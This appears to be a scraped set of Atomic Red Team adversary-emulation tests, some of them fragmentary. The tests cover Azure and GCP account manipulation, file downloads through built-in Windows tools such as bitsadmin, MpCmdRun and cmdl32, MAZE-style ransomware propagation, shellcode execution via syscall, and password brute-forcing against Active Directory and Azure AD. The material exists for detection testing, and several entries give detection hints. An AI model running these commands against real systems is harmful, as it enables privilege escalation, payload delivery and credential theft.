$sp = Get-AzureADServicePrincipal -Filter "DisplayName eq 'SuperSP'" if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } $role = Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Reader'" if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
Description: The adversaries want to add user to some Azure role, also called Azure resource role. Threat actor
may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
By default, the role Reader is assigned to user in this test.
New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription Write-Host "User Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
T1098 - Account Manipulation
Azure - adding service principal to Azure role in subscription
$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "SuperSP"} if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } $subscription = Get-AzSubscription | where-object {$_.Name -eq "Azure subscription 1"} if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } $role = Get-AzRoleDefinition | where-object {$_.Name -eq "Reader"} if ($role -eq $null) { Write-Warning "Role not found"; exit }
New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
Description: The adversaries want to add service principal to some Azure role, also called Azure resource role. Threat actor
may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
By default, the role Reader is assigned to service principal in this test.
New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "SuperSP"} if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } $subscription = Get-AzSubscription | where-object {$_.Name -eq "Azure subscription 1"} if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } $role = Get-AzRoleDefinition | where-object {$_.Name -eq "Reader"} if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
Description: The adversaries want to add permission to newly created application. Application could be then used for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
This technique will create a new app, with the provided name, and give it the provided permission. But if you prefer to add credentials to an existing app, replace in the code: "Get-AzureADApplication" instead of "New-AzureADServicePrincipal".
The DirectoryRecommendations.Read.All permissions has been selected as the default.
The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
You can also take a look at the materials:
https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
https://github.com/reprise99/Sentinel-Queries
https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
$aadApplication = @(Get-AzureADApplication -Filter "DisplayName eq 'test_app'") If ($aadApplication.Count -eq 0) { Write-Host "App not found: cannot delete it" exit } ElseIf ($aadApplication.Count -gt 1) { Write-Host "Found several app with name 'test_app': one is likely the one this technique created, but as a precaution, none will be deleted. Manual cleanup is required." exit } Else { Remove-AzureADApplication -ObjectId $aadApplication[0].ObjectId Write-Host "Successfully deleted app" }
T1098 - Account Manipulation
Password Change on Directory Service Restore Mode (DSRM) Account
Description: Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account
T1098 - Account Manipulation
Domain Password Policy Check: Short Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt" if (Test-Path $credFile) { $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString) if($cred.GetNetworkCredential().Password -eq "Uplow-1"){ Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1 } try { $newPassword = ConvertTo-SecureString Uplow-1 -AsPlainText -Force Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword } catch { $_.Exception $errCode = $_.Exception.ErrorCode Write-Host "Error code: $errCode" if ($errCode -eq 86) { Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials" Remove-Item $credFile } exit $errCode } Write-Host -ForegroundColor Cyan "Successfully changed the password to Uplow-1" $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "Uplow-1" -AsPlainText -Force)) $newCred.Password | ConvertFrom-SecureString | Out-File $credFile } else { Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first" }
Description: Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Number in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt" if (Test-Path $credFile) { $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString) if($cred.GetNetworkCredential().Password -eq "UpperLowerLong-special"){ Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1 } try { $newPassword = ConvertTo-SecureString UpperLowerLong-special -AsPlainText -Force Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword } catch { $_.Exception $errCode = $_.Exception.ErrorCode Write-Host "Error code: $errCode" if ($errCode -eq 86) { Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials" Remove-Item $credFile } exit $errCode } Write-Host -ForegroundColor Cyan "Successfully changed the password to UpperLowerLong-special" $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "UpperLowerLong-special" -AsPlainText -Force)) $newCred.Password | ConvertFrom-SecureString | Out-File $credFile } else { Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first" }
Description: Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Special Character in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt" if (Test-Path $credFile) { $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString) if($cred.GetNetworkCredential().Password -eq "UpperLowerLong333noSpecialChar"){ Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1 } try { $newPassword = ConvertTo-SecureString UpperLowerLong333noSpecialChar -AsPlainText -Force Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword } catch { $_.Exception $errCode = $_.Exception.ErrorCode Write-Host "Error code: $errCode" if ($errCode -eq 86) { Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials" Remove-Item $credFile } exit $errCode } Write-Host -ForegroundColor Cyan "Successfully changed the password to UpperLowerLong333noSpecialChar" $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "UpperLowerLong333noSpecialChar" -AsPlainText -Force)) $newCred.Password | ConvertFrom-SecureString | Out-File $credFile } else { Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first" }
Description: Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Uppercase Character in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt" if (Test-Path $credFile) { $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString) if($cred.GetNetworkCredential().Password -eq "lower-long-special-333"){ Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1 } try { $newPassword = ConvertTo-SecureString lower-long-special-333 -AsPlainText -Force Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword } catch { $_.Exception $errCode = $_.Exception.ErrorCode Write-Host "Error code: $errCode" if ($errCode -eq 86) { Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials" Remove-Item $credFile } exit $errCode } Write-Host -ForegroundColor Cyan "Successfully changed the password to lower-long-special-333" $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "lower-long-special-333" -AsPlainText -Force)) $newCred.Password | ConvertFrom-SecureString | Out-File $credFile } else { Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first" }
Description: Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: No Lowercase Character in Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt" if (Test-Path $credFile) { $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString) if($cred.GetNetworkCredential().Password -eq "UPPER-LONG-SPECIAL-333"){ Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1 } try { $newPassword = ConvertTo-SecureString UPPER-LONG-SPECIAL-333 -AsPlainText -Force Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword } catch { $_.Exception $errCode = $_.Exception.ErrorCode Write-Host "Error code: $errCode" if ($errCode -eq 86) { Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials" Remove-Item $credFile } exit $errCode } Write-Host -ForegroundColor Cyan "Successfully changed the password to UPPER-LONG-SPECIAL-333" $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "UPPER-LONG-SPECIAL-333" -AsPlainText -Force)) $newCred.Password | ConvertFrom-SecureString | Out-File $credFile } else { Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first" }
Description: Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: Only Two Character Classes
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt" if (Test-Path $credFile) { $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString) if($cred.GetNetworkCredential().Password -eq "onlyUPandLowChars"){ Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1 } try { $newPassword = ConvertTo-SecureString onlyUPandLowChars -AsPlainText -Force Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword } catch { $_.Exception $errCode = $_.Exception.ErrorCode Write-Host "Error code: $errCode" if ($errCode -eq 86) { Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials" Remove-Item $credFile } exit $errCode } Write-Host -ForegroundColor Cyan "Successfully changed the password to onlyUPandLowChars" $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "onlyUPandLowChars" -AsPlainText -Force)) $newCred.Password | ConvertFrom-SecureString | Out-File $credFile } else { Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first" }
Description: Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
Domain Password Policy Check: Common Password Use
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt" if (Test-Path $credFile) { $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString) if($cred.GetNetworkCredential().Password -eq "Spring$((Get-Date).Year)!"){ Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1 } try { $newPassword = ConvertTo-SecureString Spring$((Get-Date).Year)! -AsPlainText -Force Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword } catch { $_.Exception $errCode = $_.Exception.ErrorCode Write-Host "Error code: $errCode" if ($errCode -eq 86) { Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials" Remove-Item $credFile } exit $errCode } Write-Host -ForegroundColor Cyan "Successfully changed the password to Spring$((Get-Date).Year)!" $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "Spring$((Get-Date).Year)!" -AsPlainText -Force)) $newCred.Password | ConvertFrom-SecureString | Out-File $credFile } else { Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first" }
Description: Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
Prereq: Password for current user must be stored in a credential file
if (Test-Path $env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt) {exit 0} else {exit 1}
T1098 - Account Manipulation
GCP - Delete Service Account Key
gcloud config set project atomic-test-1 KEY=`gcloud iam service-accounts keys list --iam-account=atomic-service-account@atomic-test-1.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1` gcloud iam service-accounts keys delete $KEY --iam-account=atomic-service-account@atomic-test-1.iam.gserviceaccount.com --quiet
Description: This Atomic will:
- Create a service account
- Create a service account key,
- Store the result of retrieving a single key for that service account as a variable
- Pass that variable for deletion
- Delete the service account
The idea for this Atomic came from a Rule published by the Elastic team.
Identifies the deletion of an Identity and Access Management (IAM) service account key in Google Cloud Platform (GCP).
Each service account is associated with two sets of public/private RSA key pairs that are used to authenticate.
If a key is deleted, the application will no longer be able to access Google Cloud resources using that key. A security best practice is to rotate your service account keys regularly.
Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
Prereq: Check if terraform is installed.
terraform version
Prereq: Create dependency resources using terraform
stat "$T1098/src/T1098-17/terraform.tfstate"
Cleanup:
cd "$T1098/src/T1098-17/" terraform state rm google_service_account_key.key terraform destroy -auto-approve
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt %temp%\Atomic-license.txt
Description: This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.
pushd \\localhost\C$ echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript del AtomicTestT1105.js /Q >nul 2>&1 del AtomicTestFileT1105.js /Q >nul 2>&1 popd
Description: OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
Description: svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
Cleanup:
del C:\T1105.txt >nul 2>&1 del C:\\svchost.exe >nul 2>&1
T1105 - Ingress Tool Transfer
Download a File with Windows Defender MpCmdRun.exe
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" MpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path %temp%\Atomic-license.txt
Description: Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.
More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
Prereq: Must have a Windows Defender version with MpCmdRun.exe installed
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" MpCmdRun.exe /? >nul 2>&1
Cleanup:
del %temp%\Atomic-license.txt >nul 2>&1 del %temp%\MpCmdRun.log >nul 2>&1
T1105 - Ingress Tool Transfer
whois file download
timeout --preserve-status 1 whois -h localhost -p 8443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out
Description: Download a remote file using the whois utility
Prereq: The whois and timeout commands must be present
Description: Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
T1105 - Ingress Tool Transfer
File download with finger.exe on Windows
finger base64_filedata@localhost
Description: Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.
Because this is being tested on the localhost, you should not be expecting a successful connection
https://www.exploit-db.com/exploits/48815
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
Description: Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]..
Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
Description: The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
Expected output will include whether the file downloaded successfully or not.
Prereq: Curl must be installed on system.
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
Cleanup:
del c:\users\public\music\allthethingsx64.dll >nul 2>&1 del c:\users\public\music\allthethingsx64.dll >nul 2>&1 del c:\programdata\allthethingsx64.dll >nul 2>&1 del %Temp%\allthethingsx64.dll >nul 2>&1
Description: The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration
Expected output will include whether the file uploaded successfully or not.
Prereq: Curl must be installed on system.
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
Prereq: A file must be created to upload
if (Test-Path c:\temp\atomictestfile.txt) {exit 0} else {exit 1}
T1105 - Ingress Tool Transfer
Download a file with Microsoft Connection Manager Auto-Download
"T1105\src\T1105.bat" 1>NUL
Description: Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file.
The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user.
Upon successful execution the test will open calculator and Notepad executable for 10 seconds.
reference:
https://twitter.com/ElliotKillick/status/1455897435063074824
https://github.com/LOLBAS-Project/LOLBAS/pull/151
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
Prereq: T1105\src\T1105.bat must exist on system.
if (Test-Path "T1105\src\T1105.bat") {exit 0} else {exit 1}
Cleanup:
del /f/s/q %temp%\T1105 >nul 2>&1 rmdir /s/q %temp%\T1105 >nul 2>&1
Description: This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one.
Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
Prereq: Binary file must exist at specified location ($env:comspec)
if (Test-Path $env:comspec) {exit 0} else {exit 1}
Prereq: Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")
if (Test-Path "..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
Cleanup:
if (test-path "..\ExternalPayloads\T1105CompletedHosts.txt") {foreach ($machine in get-content -path "..\ExternalPayloads\T1105CompletedHosts.txt") {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null Remove-Item -path "\\$machine\C$\Windows\Temp\T1105.exe" -force -erroraction silentlycontinue}} Remove-Item -path "..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue Remove-item -path "..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
T1105 - Ingress Tool Transfer
Printer Migration Command-Line Tool UNC share folder into a zip file
del %TEMP%\PrintBrm.zip >nul 2>&1 C:\Windows\System32\spool\tools\PrintBrm.exe -b -d \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ -f %TEMP%\PrintBrm.zip -O FORCE
Description: Create a ZIP file from a folder in a remote drive
Cleanup:
del %TEMP%\PrintBrm.zip >nul 2>&1
T1105 - Ingress Tool Transfer
Lolbas replace.exe use to copy file
del %TEMP%\redcanary.cab >nul 2>&1 C:\Windows\System32\replace.exe "T1105\src\redcanary.cab" %TEMP% /A
Description: Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Prereq: T1105\src\redcanary.cab must exist on system.
if (Test-Path "T1105\src\redcanary.cab") {exit 0} else {exit 1}
Cleanup:
del %TEMP%\redcanary.cab >nul 2>&1
T1105 - Ingress Tool Transfer
Lolbas replace.exe use to copy UNC file
del %TEMP%\redcanary.cab >nul 2>&1 C:\Windows\System32\replace.exe \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab %TEMP% /A
Description: Copy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Description: GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github.
[Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
Prereq: Gup.exe binary must exist on disk at specified location (T1105\bin\GUP.exe)
if (Test-Path "T1105\bin\GUP.exe") {exit 0} else {exit 1}
Description: One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL
Prereq: Windows package 'Sqlcmd' need to be available in the machine to execute this atomic successfully
if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
Description: Copy a staged file using PSCP.exe to a public target location.
Prereq: pscp.exe must be available on the system.
if (Test-Path ..\ExternalPayloads\pscp.exe) {exit 0} else {exit 1}
Cleanup:
del /f /q C:\Temp\T1105_scp.zip
T1105 - Ingress Tool Transfer
Windows push file using scp.exe
# Check if the folder exists, create it if it doesn't $folderPath = "C:\temp" if (-Not (Test-Path -Path $folderPath)) { New-Item -Path $folderPath -ItemType Directory }
Description: This test simulates pulling files using SFTP on a Windows environment.
Prereq: This test requires the `sftp` command to be available on the system.
if (Get-Command sftp -ErrorAction SilentlyContinue) { Write-Output "SFTP command is available." exit 0 } else { Write-Output "SFTP command is not available." exit 1 }
T1105 - Ingress Tool Transfer
Download a file with OneDrive Standalone Updater
if (-not (Test-Path "C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe")) { Write-Host "OneDriveStandaloneUpdater.exe not found at C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe. Test cannot continue." exit 1 }
# Run OneDrive Standalone Updater & "C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"
Description: Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
This technique can be used to download files without executing anomalous executables.
Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
Prereq: OneDriveStandaloneUpdater.exe must exist on disk at specified location
if (Test-Path "C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe") {exit 0} else {exit 1}
Description: Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
against a target URL. The pod is automatically deleted after execution.
Description: Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwn
T1106 - Native API
Run Shellcode via Syscall in Go
$T1106\bin\x64\syscall.exe -debug
Description: Runs shellcode in the current running process via a syscall.
Steps taken with this technique
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Use syscall to execute the entrypoint of the shellcode
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
$passwordList = Get-Content -Path "T1110.001\src\passwords.txt" foreach ($password in $passwordList){ $credz = new-object System.Net.NetworkCredential("$ENV:USERNAME", $password, "$env:UserDnsDomain") $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM) try { Write-Host " [-] Attempting ${password} on account $ENV:USERNAME." $conn.bind() # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success Write-Host " [!] $ENV:USERNAME:${password} are valid credentials!" } catch { Write-Host $_.Exception.Message } } Write-Host "End of bruteforce"
Description: Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos
T1110.001 - Brute Force: Password Guessing
Brute Force Credentials of single Azure AD user
Import-Module -Name AzureAD
$passwords = "Password1`n1q2w3e4r`nPassword!".split("{`n}") foreach($password in $passwords) { $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "bruce.wayne@contoso.com", $Pword try { Write-Host " [-] Attempting ${password} on account bruce.wayne@contoso.com." Connect-AzureAD -Credential $Credential 2>&1> $null # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success Write-Host " [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n" break } catch { Write-Host " [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n" } } Write-Host "End of bruteforce"
Description: Attempt to brute force Azure AD user via AzureAD powershell module.
cd "..\ExternalPayloads" .\kerbrute.exe bruteuser --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\bruteuser.txt TestUser1
Description: Bruteforce a single user's password from a wordlist
Prereq: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
